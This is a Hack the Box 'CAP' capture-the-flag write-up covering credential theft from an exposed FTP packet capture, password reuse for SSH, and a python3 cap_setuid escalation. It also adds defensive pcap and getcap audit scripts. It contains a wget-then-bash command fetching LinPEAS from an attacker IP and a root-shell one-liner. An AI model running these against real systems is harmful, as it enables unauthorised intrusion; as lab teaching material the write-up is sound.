Hack the Box - CAP

Write-up of CAP - Difficulty: Easy

1. Recon

We start by running rustscan to find any open ports on the box.

rustscan -a 10.129.227.218 --ulimit 5000

[Image: /cap/rustcan.png]
Afterwards we can start a gobuster scan to find any directories while we look at the site.

[Image: /cap/drib.png]

2.1 Website

The website appears to be a monitoring tool that already has a user logged in.
[Image: /cap/website.png]

If we go to /data we can see that network packets are being captured, and we are able to download the PCAP file to view it in Wireshark.
[Image: /cap/website2.png]

Notice that each capture is served under a sequential numeric ID, so it is worth trying lower numbers than the one we arrive at in the hope of finding other PCAP files. /0 is valid and allows us to download a capture from when Nathan had logged into the FTP server.
[Image: /cap/website3.png]
If we load that PCAP file into Wireshark we can view Nathan's username and password, because FTP sends both in cleartext.
[Image: /cap/pcap.png]
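The reason the capture gives up Nathan's password is that the FTP control channel carries USER and PASS commands unencrypted. The script below is an added example, not code from the write-up or from Hack the Box, showing how a defender can scan a classic pcap file for cleartext FTP logins using only the Python standard library. It builds a small constructed capture in memory (Ethernet/IPv4/TCP frames to port 21 with made-up user "alice" and password "hunter2") so it runs offline, and reports each login with only the password length, never the password itself.

```python
"""Flag cleartext FTP logins in a classic (non-pcapng) pcap file.

Added example for this write-up; not the author's code. The pcap builder
exists only to construct sample input inline so the parser can be run
offline. All addresses and credentials below are made up.
"""
import struct

FTP_PORT = 21


def build_packet(src_ip, dst_ip, sport, dport, payload):
    """Constructed Ethernet/IPv4/TCP frame; checksums are left zero."""
    eth = b"\x00" * 12 + b"\x08\x00"                     # MACs + EtherType IPv4
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src_ip.split("."))),
                     bytes(map(int, dst_ip.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(packets):
    """Classic pcap: 24-byte global header, then per-packet record headers."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    for i, pkt in enumerate(packets):
        out += struct.pack("<IIII", 1600000000 + i, 0, len(pkt), len(pkt)) + pkt
    return out


def iter_packets(data):
    """Yield raw frames from pcap bytes, honouring the magic's byte order."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    if struct.unpack(endian + "I", data[20:24])[0] != 1:
        raise ValueError("only Ethernet link type is handled here")
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def parse_tcp(frame):
    """Return (src_ip, dst_ip, sport, dport, payload) or None if not IPv4/TCP."""
    if len(frame) < 54 or frame[12:14] != b"\x08\x00":
        return None
    ihl = (frame[14] & 0x0F) * 4                         # IPv4 header length
    if frame[14 + 9] != 6:                               # protocol 6 = TCP
        return None
    src = ".".join(str(b) for b in frame[26:30])
    dst = ".".join(str(b) for b in frame[30:34])
    tcp_off = 14 + ihl
    sport, dport = struct.unpack("!HH", frame[tcp_off:tcp_off + 4])
    data_off = (frame[tcp_off + 12] >> 4) * 4            # TCP header length
    return src, dst, sport, dport, frame[tcp_off + data_off:]


def find_cleartext_ftp_logins(pcap_bytes):
    """Pair USER/PASS commands per client connection; never return the password."""
    findings, pending = [], {}
    for frame in iter_packets(pcap_bytes):
        parsed = parse_tcp(frame)
        if parsed is None:
            continue
        src, dst, sport, dport, payload = parsed
        if dport != FTP_PORT or not payload:
            continue
        key = (src, dst, sport)
        for line in payload.decode("ascii", "replace").splitlines():
            cmd, _, arg = line.partition(" ")
            if cmd.upper() == "USER":
                pending[key] = arg.strip()
            elif cmd.upper() == "PASS":
                findings.append({"client": src, "server": dst,
                                 "user": pending.pop(key, "?"),
                                 "password_length": len(arg.strip())})
    return findings


# Constructed sample capture: one FTP login plus an unrelated HTTP request.
SAMPLE_PCAP = build_pcap([
    build_packet("10.0.0.5", "10.0.0.1", 40001, 21, b"USER alice\r\n"),
    build_packet("10.0.0.1", "10.0.0.5", 21, 40001, b"331 Please specify the password.\r\n"),
    build_packet("10.0.0.5", "10.0.0.1", 40001, 21, b"PASS hunter2\r\n"),
    build_packet("10.0.0.5", "10.0.0.1", 40002, 80, b"GET / HTTP/1.0\r\n\r\n"),
])

if __name__ == "__main__":
    for f in find_cleartext_ftp_logins(SAMPLE_PCAP):
        print(f"cleartext FTP login {f['user']!r} from {f['client']} to {f['server']}")
```

Run it against a real capture by passing the file's bytes to find_cleartext_ftp_logins. Every hit is a credential that anyone on the path could have read; the fix is to retire plain FTP in favour of SFTP or FTPS, and, as this box shows, to make sure the FTP password is not reused for SSH.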

3. Foothold

Nathan's credentials work on the FTP server and, because the same password is reused, also let us SSH into the box and grab the user flag.
[Image: /cap/ssh.png]

4. Privilege Escalation

From there we can upload LinPEAS to the box by hosting a Python web server on our attack box and fetching the script with wget. Running linpeas.sh shows that python3 has the cap_setuid capability set.

# attack box
python3 -m http.server
# victim box
wget http://10.10.14.3:8000/linpeas.sh; bash linpeas.sh

[Image: /cap/linpeas.png]
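LinPEAS surfaces the cap_setuid finding by running getcap over the filesystem and matching known-dangerous capabilities. The following is an added example, not code from the write-up or from LinPEAS, of the same check as a small audit script a defender can run from a hardening pipeline: it parses getcap output (both the older "path = caps+ep" layout and the newer "path caps=ep" layout), flags capabilities that amount to root, and rates them critical when the binary is a general-purpose interpreter such as python3. The sample getcap output is constructed; only the python3 line mirrors what the write-up found.

```python
"""Audit file capabilities for privilege-escalation risk.

Added example for this write-up; not the author's code and not LinPEAS.
Feed it the text of `getcap -r / 2>/dev/null`. The sample below is constructed.
"""
import re

# Capabilities that on their own let a process reach root or read/alter any file.
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner",
}

# Interpreters: any local user can drive the capability with arbitrary code.
INTERPRETERS = re.compile(
    r"(^|/)(python[0-9.]*|perl[0-9.]*|ruby[0-9.]*|node|php[0-9.]*|lua[0-9.]*)$")


def parse_getcap_line(line):
    """Return (path, set of cap names) for one getcap line, or None."""
    line = line.strip()
    if not line:
        return None
    path, _, rest = line.partition(" ")
    rest = rest.lstrip("= ")                 # old format puts " = " before the caps
    caps = set(re.findall(r"cap_[a-z_]+", rest))
    return (path, caps) if caps else None


def audit_getcap(output):
    """List binaries carrying dangerous capabilities, with a severity rating."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        risky = sorted(caps & DANGEROUS_CAPS)
        if not risky:
            continue
        severity = "critical" if INTERPRETERS.search(path) else "high"
        findings.append({"path": path, "caps": risky, "severity": severity})
    return findings


# Constructed sample getcap output mixing both output layouts.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3 = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/sbin/some-agent cap_dac_read_search,cap_sys_ptrace=ep
"""

if __name__ == "__main__":
    for f in audit_getcap(SAMPLE_GETCAP):
        print(f"[{f['severity']}] {f['path']}: {', '.join(f['caps'])}")
```

cap_net_raw on ping is expected and is not reported; cap_setuid on an interpreter is the finding that matters, because it is equivalent to a setuid-root python. Remediation is to strip it with setcap -r on that binary and, if some workload genuinely needs the capability, grant it to a dedicated minimal helper rather than to a general-purpose interpreter.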

Heading over to www.gtfobins.com, we see that this capability on python3 is enough to get a root shell.
[Image: /cap/gtfobins.png]
Using the GTFOBins command we are able to get a root shell and grab the root flag.

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

[Image: /cap/root.png]

If this write-up was helpful consider leaving some respect on my HTB profile.